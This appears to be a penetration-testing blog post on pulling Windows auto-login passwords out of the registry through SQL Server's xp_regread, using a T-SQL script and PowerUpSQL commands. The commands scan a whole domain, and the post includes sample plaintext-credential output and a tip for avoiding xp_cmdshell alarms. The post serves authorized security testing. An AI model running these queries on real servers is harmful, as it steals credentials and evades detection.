

Get Windows Auto Login Passwords via SQL Server with PowerUpSQL

In this blog I'll show how to use PowerUpSQL to dump Windows auto login passwords through SQL Server. I'll also talk about other ways the `xp_regread` stored procedure can be used during pentests.

A brief history of `xp_regread`

The `xp_regread` extended stored procedure has been around since SQL Server 2000. The original version allowed members of the Public server role to access pretty much anything the SQL Server service account had privileges to. At the time, it had a pretty big impact, because it was common for SQL Servers to run as LocalSystem.

Since SQL Server 2000 SP4 was released, the impact of the `xp_regread` has been pretty minimal due to a few access controls that were added that help prevent low privileged logins from accessing sensitive registry locations. Now days, the only registry locations accessible to unprivileged users are related to SQL Server. For a list of those locations you can visit <https://support.microsoft.com/en-us/kb/887165>

Below are a few of the more interesting accessible paths:

```
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\  
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer  
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Search  
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQLServer  
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Messaging Subsystem  
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\SQLServer  
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents  
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SQLServer  
HKEY_CURRENT_USER\Software\Microsoft\Mail HKEY_CURRENT_USER\Control Panel\International
```

Practical uses for `xp_regread` with the Public Role

Even with our hands tied, `xp_regread` can be used to grab a lot of useful information. In fact, when logged in as least privilege login, I often use it to grab server information that I couldn't get anywhere else. For example, the `Get-SQLServerInfo` function in PowerUpSQL includes some of those queries.

```
PS C:\> Get-SQLServerInfo  
ComputerName      : SQLServer1  
Instance         : SQLServer1  
DomainName       : demo.local  
ServiceName      : MSSQLSERVER  
ServiceAccount   : NT Service\MSSQLSERVER  
AuthenticationMode : Windows and SQL Server Authentication  
Clustered        : No  
SQLServerVersionNumber : 12.0.4213.0
```

```
SQLServerMajorVersion : 2014
SQLServerEdition      : Developer Edition (64-bit)
SQLServerServicePack : SP1
OSArchitecture        : X64
OsMachineType         : WinNT
OSVersionName         : Windows 8.1 Pro
OsVersionNumber       : 6.3
Currentlogin          : demo\user
IsSysadmin             : Yes
ActiveSessions        : 3
```

The access control restrictions implemented in SQL Server SP4 **do not** apply to sysadmins. As a result, anything the SQL Server service account can access in the registry, a sysadmin can access via `xp_regread`.

At first glance this may not seem like a big deal, but it does allow us to pull sensitive data from the registry without having to enable `xp_cmdshell`, which can trigger a lot of alarms when it's enabled and used. So `xp_regread` actually ends up being handy for basic SQL Server post exploitation tasks.

Recovering Windows Auto Login Credentials with `xp_regread`

It's possible to configure Windows to automatically login when the computer is started. While this is not a common configuration in corporate environments, it's something we see frequently in retail environments. Especially those that support legacy POS terminals and kiosks with SQL Servers running locally. In most cases, when Windows is configured to login automatically, unencrypted credentials are stored in the registry key:

```
HKEY_LOCAL_MACHINE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
```

Using that information we can write a basic TSQL script that uses `xp_regread` to pull the auto login credentials out of the registry for us without having to enable `xp_cmdshell`. Below is an example TSQL script, but since the registry paths aren't on the allowed list we have to run the query as a sysadmin:

```
-----
-- Get Windows Auto Login Credentials from the Registry
-----

-- Get AutoLogin Default Domain
DECLARE @AutoLoginDomain SYSNAME
EXECUTE master.dbo.xp_regread
@rootkey          = N'HKEY_LOCAL_MACHINE',
@key              = N'SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon',
@value_name      = N'DefaultDomainName',
@value           = @AutoLoginDomain output

-- Get AutoLogin DefaultUsername
```

```

DECLARE @AutoLoginUser SYSNAME
EXECUTE master.dbo.xp_regread
@rootkey          = N'HKEY_LOCAL_MACHINE',
@key              = N'SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon',
@value_name      = N'DefaultUserName',
@value           = @AutoLoginUser output

-- Get AutoLogin DefaultUsername
DECLARE @AutoLoginPassword SYSNAME
EXECUTE master.dbo.xp_regread
@rootkey          = N'HKEY_LOCAL_MACHINE',
@key              = N'SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon',
@value_name      = N'DefaultPassword',
@value           = @AutoLoginPassword output

-- Display Results
SELECT @AutoLoginDomain, @AutoLoginUser, @AutoLoginPassword

```

I've also created a PowerUpSQL function called "Get-SQLRecoverPwAutoLogon" so you could run it on scale. It will recover the default Windows auto login information and the alternative Windows auto login information if it has been set. Then it returns the associated domain name, user name, and password.

Below is a command example for those who are interested. If you're interest in learning about blindy targeting SQL Server you can peek at this blog.

```

PS C:\> $Accessible = Get-SQLInstanceDomain -Verbose | Get-
SQLConnectionTestThreaded -Verbose -Threads 15 | Where-Object {$_.Status -eq
"Accessible"}
PS C:\> $Accessible | Get-SQLRecoverPwAutoLogon -Verbose
VERBOSE: SQLServer1.demo.local\Instance1 : Connection Success.
VERBOSE: SQLServer2.demo.local\Application : Connection Success.
VERBOSE: SQLServer2.demo.local\Application : This function requires sysadmin
privileges. Done.
VERBOSE: SQLServer3.demo.local\2014 : Connection Success.
VERBOSE: SQLServer3.demo.local\2014 : This function requires sysadmin
privileges. Done.

```

```

ComputerName : SQLServer1
Instance     : SQLServer1\Instance1
Domain       : demo.local
UserName     : KioskAdmin
Password     : test

```

```

ComputerName : SQLServer1
Instance     : SQLServer1\Instance1
Domain       : demo.local

```

UserName : kioskuser
Password : KioskUserPassword!

Wrap Up

Even though the xp_regread extended stored procedure has been partially neutered, there are still a number of ways that it can prove useful during penetration tests and red team engagements. Hopefully you'll have some fun with the "Get-SQLServerInfo", "Get-SQLRecoverPwAutoLogon" functions that build off of its capabilities. More registry fun to come. In the meantime, good luck and hack responsibly!

References

- <https://support.microsoft.com/en-us/kb/887165>
- [https://msdn.microsoft.com/en-us/library/aa940179\(v=winembedded.5\).aspx](https://msdn.microsoft.com/en-us/library/aa940179(v=winembedded.5).aspx)
- <http://sqlmag.com/t-sql/using-t-sql-manipulate-registry>